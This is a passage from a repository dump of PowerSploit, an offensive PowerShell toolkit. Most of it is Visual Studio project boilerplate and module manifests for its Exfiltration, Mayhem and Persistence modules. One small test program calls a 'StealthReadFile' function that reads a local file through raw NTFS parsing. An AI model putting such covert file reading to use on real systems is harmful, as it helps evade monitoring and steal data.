| EndGlobalSection 23 | GlobalSection(SolutionProperties) = preSolution 24 | 
HideSolutionNode = FALSE 25 | EndGlobalSection 26 | EndGlobal 27 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/LogonUser/LogonUser/LogonUser/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | CONSOLE APPLICATION : LogonUser Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this LogonUser application for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your LogonUser application. 9 | 10 | 11 | LogonUser.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | LogonUser.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 
19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | LogonUser.cpp 25 | This is the main application source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named LogonUser.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // LogonUser.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 
| #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | 16 | 17 | 18 | 19 | 20 | // TODO: reference additional headers your program requires here 21 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/LogonUser/LogonUser/LogonUser/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/LogonUser/LogonUser/logon/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | DYNAMIC LINK LIBRARY : logon Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this logon DLL for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your logon application. 9 | 10 | 11 | logon.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | logon.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. 
This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | logon.cpp 25 | This is the main DLL source file. 26 | 27 | When created, this DLL does not export any symbols. As a result, it 28 | will not produce a .lib file when it is built. If you wish this project 29 | to be a project dependency of some other project, you will either need to 30 | add code to export some symbols from the DLL so that an export library 31 | will be produced, or you can set the Ignore Input Library property to Yes 32 | on the General property page of the Linker folder in the project's Property 33 | Pages dialog box. 34 | 35 | ///////////////////////////////////////////////////////////////////////////// 36 | Other standard files: 37 | 38 | StdAfx.h, StdAfx.cpp 39 | These files are used to build a precompiled header (PCH) file 40 | named logon.pch and a precompiled types file named StdAfx.obj. 41 | 42 | ///////////////////////////////////////////////////////////////////////////// 43 | Other notes: 44 | 45 | AppWizard uses "TODO:" comments to indicate parts of the source code you 46 | should add to or customize. 47 | 48 | ///////////////////////////////////////////////////////////////////////////// 49 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/LogonUser/LogonUser/logon/dllmain.cpp: -------------------------------------------------------------------------------- 1 | // dllmain.cpp : Defines the entry point for the DLL application. 
2 | #include "stdafx.h" 3 | 4 | BOOL APIENTRY DllMain( HMODULE hModule, 5 | DWORD ul_reason_for_call, 6 | LPVOID lpReserved 7 | ) 8 | { 9 | switch (ul_reason_for_call) 10 | { 11 | case DLL_PROCESS_ATTACH: 12 | case DLL_THREAD_ATTACH: 13 | case DLL_THREAD_DETACH: 14 | case DLL_PROCESS_DETACH: 15 | break; 16 | } 17 | return TRUE; 18 | } 19 | 20 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/LogonUser/LogonUser/logon/logon.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | Source Files 37 | 38 | 39 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/LogonUser/LogonUser/logon/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // logon.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/LogonUser/LogonUser/logon/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project 
specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | // Windows Header Files: 12 | #include "targetver.h" 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | 23 | 24 | 25 | // TODO: reference additional headers your program requires here 26 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/LogonUser/LogonUser/logon/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 
7 | 8 | #include 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/NTFSParser/NTFSParser.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2012 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NTFSParserDLL", "NTFSParserDLL\NTFSParserDLL.vcxproj", "{5E42B778-F231-4797-B7FD-7D5BCA9738D0}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Debug|x64 = Debug|x64 10 | Release|Win32 = Release|Win32 11 | Release|x64 = Release|x64 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|Win32.ActiveCfg = Debug|Win32 15 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|Win32.Build.0 = Debug|Win32 16 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|x64.ActiveCfg = Debug|x64 17 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|x64.Build.0 = Debug|x64 18 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|Win32.ActiveCfg = Release|Win32 19 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|Win32.Build.0 = Release|Win32 20 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|x64.ActiveCfg = Release|x64 21 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|x64.Build.0 = Release|x64 22 | EndGlobalSection 23 | GlobalSection(SolutionProperties) = preSolution 24 | HideSolutionNode = FALSE 25 | EndGlobalSection 26 | EndGlobal 27 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/NTFSParser/NTFSParser/NTFS.h: -------------------------------------------------------------------------------- 1 | /* 2 | * NTFS include files 3 | * 4 | * Copyright(C) 2010 cyb70289 5 | * 6 | * This program/include file is free software; you can redistribute it and/or 7 | * modify it under the terms of the 
GNU General Public License as published 8 | * by the Free Software Foundation; either version 2 of the License, or 9 | * (at your option) any later version. 10 | * 11 | * This program/include file is distributed in the hope that it will be 12 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty 13 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | * GNU General Public License for more details. 15 | */ 16 | 17 | #ifndef __NTFS_H_CYB70289 18 | #define __NTFS_H_CYB70289 19 | 20 | #pragma pack(8) 21 | 22 | #include "NTFS_Common.h" 23 | #include "NTFS_FileRecord.h" 24 | #include "NTFS_Attribute.h" 25 | 26 | #pragma pack() 27 | 28 | #endif 29 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/NTFSParser/NTFSParser/NTFSParser.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * 3 | * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek 4 | * 5 | * This program/include file is free software; you can redistribute it and/or 6 | * modify it under the terms of the GNU General Public License as published 7 | * by the Free Software Foundation; either version 2 of the License, or 8 | * (at your option) any later version. 9 | * 10 | * This program/include file is distributed in the hope that it will be 11 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty 12 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | * GNU General Public License for more details. 
14 | */ 15 | // 16 | // This code uses libraries released under GPLv2(or later) written by cyb70289 17 | 18 | #include "stdafx.h" 19 | #include "NTFS.h" 20 | #include "NTFS_Attribute.h" 21 | #include "NTFS_Common.h" 22 | #include "NTFS_DataType.h" 23 | #include "NTFS_FileRecord.h" 24 | 25 | using namespace std; 26 | 27 | typedef DWORD (CDECL *StealthReadFile_Func)(string, BYTE*, DWORD, ULONGLONG, DWORD*, ULONGLONG*); 28 | 29 | int _tmain(int argc, _TCHAR* argv[]) 30 | { 31 | HMODULE parserDLLHandle = LoadLibraryA("NTFSParserDLL.dll"); 32 | HANDLE procAddress = GetProcAddress(parserDLLHandle, "StealthReadFile"); 33 | 34 | StealthReadFile_Func StealthReadFile = (StealthReadFile_Func)procAddress; 35 | 36 | DWORD buffSize = 1024*1024; 37 | BYTE* buffer = new BYTE[buffSize]; 38 | DWORD bytesRead = 0; 39 | ULONGLONG bytesLeft = 0; 40 | DWORD ret = StealthReadFile("c:\\test\\test.txt", buffer, buffSize, 0, &bytesRead, &bytesLeft); 41 | 42 | cout << "Return value: " << ret << endl; 43 | 44 | ofstream myFile("c:\\test\\test2.txt", ios::out | ios::binary); 45 | myFile.write((char*)buffer, bytesRead); 46 | 47 | return 0; 48 | } 49 | 50 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/NTFSParser/NTFSParser/NTFSParser.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | Header Files 29 | 30 | 31 | Header Files 32 | 33 | 34 | Header Files 35 | 36 | 37 | Header Files 38 | 39 | 40 | Header Files 41 | 42 | 43 | 44 | 45 | Source Files 46 | 47 | 48 
| Source Files 49 | 50 | 51 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/NTFSParser/NTFSParser/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | CONSOLE APPLICATION : NTFSParser Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this NTFSParser application for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your NTFSParser application. 9 | 10 | 11 | NTFSParser.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | NTFSParser.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | NTFSParser.cpp 25 | This is the main application source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named NTFSParser.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 
39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/NTFSParser/NTFSParser/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // NTFSParser.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/NTFSParser/NTFSParser/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | 16 | 17 | // TODO: reference additional headers your program requires here 18 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/NTFSParser/NTFSParser/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 
7 | 8 | #include 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/NTFSParser/NTFSParserDLL/NTFS.h: -------------------------------------------------------------------------------- 1 | /* 2 | * NTFS include files 3 | * 4 | * Copyright(C) 2010 cyb70289 5 | * 6 | * This program/include file is free software; you can redistribute it and/or 7 | * modify it under the terms of the GNU General Public License as published 8 | * by the Free Software Foundation; either version 2 of the License, or 9 | * (at your option) any later version. 10 | * 11 | * This program/include file is distributed in the hope that it will be 12 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty 13 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | * GNU General Public License for more details. 15 | */ 16 | 17 | #ifndef __NTFS_H_CYB70289 18 | #define __NTFS_H_CYB70289 19 | 20 | #pragma pack(8) 21 | 22 | #include "NTFS_Common.h" 23 | #include "NTFS_FileRecord.h" 24 | #include "NTFS_Attribute.h" 25 | 26 | #pragma pack() 27 | 28 | #endif 29 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/NTFSParser/NTFSParserDLL/NTFSParserDLL.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | Source Files 37 | 38 | 39 | -------------------------------------------------------------------------------- 
/powershell/PowerSploit/Exfiltration/NTFSParser/NTFSParserDLL/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | DYNAMIC LINK LIBRARY : NTFSParserDLL Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this NTFSParserDLL DLL for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your NTFSParserDLL application. 9 | 10 | 11 | NTFSParserDLL.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | NTFSParserDLL.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | NTFSParserDLL.cpp 25 | This is the main DLL source file. 26 | 27 | When created, this DLL does not export any symbols. As a result, it 28 | will not produce a .lib file when it is built. If you wish this project 29 | to be a project dependency of some other project, you will either need to 30 | add code to export some symbols from the DLL so that an export library 31 | will be produced, or you can set the Ignore Input Library property to Yes 32 | on the General property page of the Linker folder in the project's Property 33 | Pages dialog box. 
34 | 35 | ///////////////////////////////////////////////////////////////////////////// 36 | Other standard files: 37 | 38 | StdAfx.h, StdAfx.cpp 39 | These files are used to build a precompiled header (PCH) file 40 | named NTFSParserDLL.pch and a precompiled types file named StdAfx.obj. 41 | 42 | ///////////////////////////////////////////////////////////////////////////// 43 | Other notes: 44 | 45 | AppWizard uses "TODO:" comments to indicate parts of the source code you 46 | should add to or customize. 47 | 48 | ///////////////////////////////////////////////////////////////////////////// 49 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/NTFSParser/NTFSParserDLL/dllmain.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * 3 | * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek 4 | * 5 | * This program/include file is free software; you can redistribute it and/or 6 | * modify it under the terms of the GNU General Public License as published 7 | * by the Free Software Foundation; either version 2 of the License, or 8 | * (at your option) any later version. 9 | * 10 | * This program/include file is distributed in the hope that it will be 11 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty 12 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | * GNU General Public License for more details. 14 | */ 15 | // 16 | // This code uses libraries released under GPLv2(or later) written by cyb70289 17 | 18 | // dllmain.cpp : Defines the entry point for the DLL application. 
19 | #include "stdafx.h" 20 | 21 | BOOL APIENTRY DllMain( HMODULE hModule, 22 | DWORD ul_reason_for_call, 23 | LPVOID lpReserved 24 | ) 25 | { 26 | switch (ul_reason_for_call) 27 | { 28 | case DLL_PROCESS_ATTACH: 29 | case DLL_THREAD_ATTACH: 30 | case DLL_THREAD_DETACH: 31 | case DLL_PROCESS_DETACH: 32 | break; 33 | } 34 | return TRUE; 35 | } 36 | 37 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/NTFSParser/NTFSParserDLL/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // NTFSParserDLL.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/NTFSParser/NTFSParserDLL/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | // Windows Header Files: 12 | #include 13 | #include 14 | #include 15 | 16 | 17 | 18 | // TODO: reference additional headers your program requires here 19 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/NTFSParser/NTFSParserDLL/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 
4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/Usage.md: -------------------------------------------------------------------------------- 1 | To install this module, drop the entire Exfiltration folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. 2 | 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" 5 | 6 | To use the module, type `Import-Module Exfiltration` 7 | 8 | To see the commands imported, type `Get-Command -Module Exfiltration` 9 | 10 | For help on each individual command, Get-Help is your friend. 11 | 12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. -------------------------------------------------------------------------------- /powershell/PowerSploit/LICENSE: -------------------------------------------------------------------------------- 1 | PowerSploit is provided under the 3-clause BSD license below. 2 | 3 | ************************************************************* 4 | 5 | Copyright (c) 2012, Matthew Graeber 6 | All rights reserved. 7 | 8 | Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 9 | 10 | Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 
11 | Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 12 | The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission. 13 | 14 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 15 | 16 | 17 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Mayhem/Mayhem.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary module file associated with this manifest. 4 | ModuleToProcess = 'Mayhem.psm1' 5 | 6 | # Version number of this module. 
7 | ModuleVersion = '3.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = 'e65b93ff-63ba-4c38-97f1-bc4fe5a6651c' 11 | 12 | # Author of this module 13 | Author = 'Matthew Graeber' 14 | 15 | # Copyright statement for this module 16 | Copyright = 'BSD 3-Clause' 17 | 18 | # Description of the functionality provided by this module 19 | Description = 'PowerSploit Mayhem Module' 20 | 21 | # Minimum version of the Windows PowerShell engine required by this module 22 | PowerShellVersion = '2.0' 23 | 24 | # Functions to export from this module 25 | FunctionsToExport = '*' 26 | 27 | # List of all files packaged with this module 28 | FileList = 'Mayhem.psm1', 'Mayhem.psd1', 'Usage.md' 29 | 30 | } 31 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Mayhem/Usage.md: -------------------------------------------------------------------------------- 1 | To install this module, drop the entire Mayhem folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. 2 | 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" 5 | 6 | To use the module, type `Import-Module Mayhem` 7 | 8 | To see the commands imported, type `Get-Command -Module Mayhem` 9 | 10 | For help on each individual command, Get-Help is your friend. 11 | 12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. 
-------------------------------------------------------------------------------- /powershell/PowerSploit/Persistence/Persistence.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary module file associated with this manifest. 4 | ModuleToProcess = 'Persistence.psm1' 5 | 6 | # Version number of this module. 7 | ModuleVersion = '3.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = '633d0f10-a056-41da-869d-6d2f75430195' 11 | 12 | # Author of this module 13 | Author = 'Matthew Graeber' 14 | 15 | # Copyright statement for this module 16 | Copyright = 'BSD 3-Clause' 17 | 18 | # Description of the functionality provided by this module 19 | Description = 'PowerSploit Persistence Module' 20 | 21 | # Minimum version of the Windows PowerShell engine required by this module 22 | PowerShellVersion = '2.0' 23 | 24 | # Functions to export from this module 25 | FunctionsToExport = '*' 26 | 27 | # List of all files packaged with this module 28 | FileList = 'Persistence.psm1', 'Persistence.psd1', 'Usage.md' 29 | 30 | } 31 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Persistence/Usage.md: -------------------------------------------------------------------------------- 1 | To install this module, drop the entire ScriptModification folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. 2 | 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" 5 | 6 | To use the module, type `Import-Module Persistence` 7 | 8 | To see the commands imported, type `Get-Command -Module Persistence` 9 | 10 | For help on each individual command, Get-Help is your friend. 
-------------------------------------------------------------------------------- /powershell/PowerSploit/PowerSploit.psm1: -------------------------------------------------------------------------------- 1 | Get-ChildItem $PSScriptRoot | ? { $_.PSIsContainer -and !('Tests','docs' -contains $_.Name) } | % { Import-Module $_.FullName -DisableNameChecking } 2 | -------------------------------------------------------------------------------- /powershell/PowerSploit/PowerSploit.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 14 4 | VisualStudioVersion = 14.0.23107.0 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{F5034706-568F-408A-B7B3-4D38C6DB8A32}") = "PowerSploit", "PowerSploit.pssproj", "{6CAFC0C6-A428-4D30-A9F9-700E829FEA51}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | 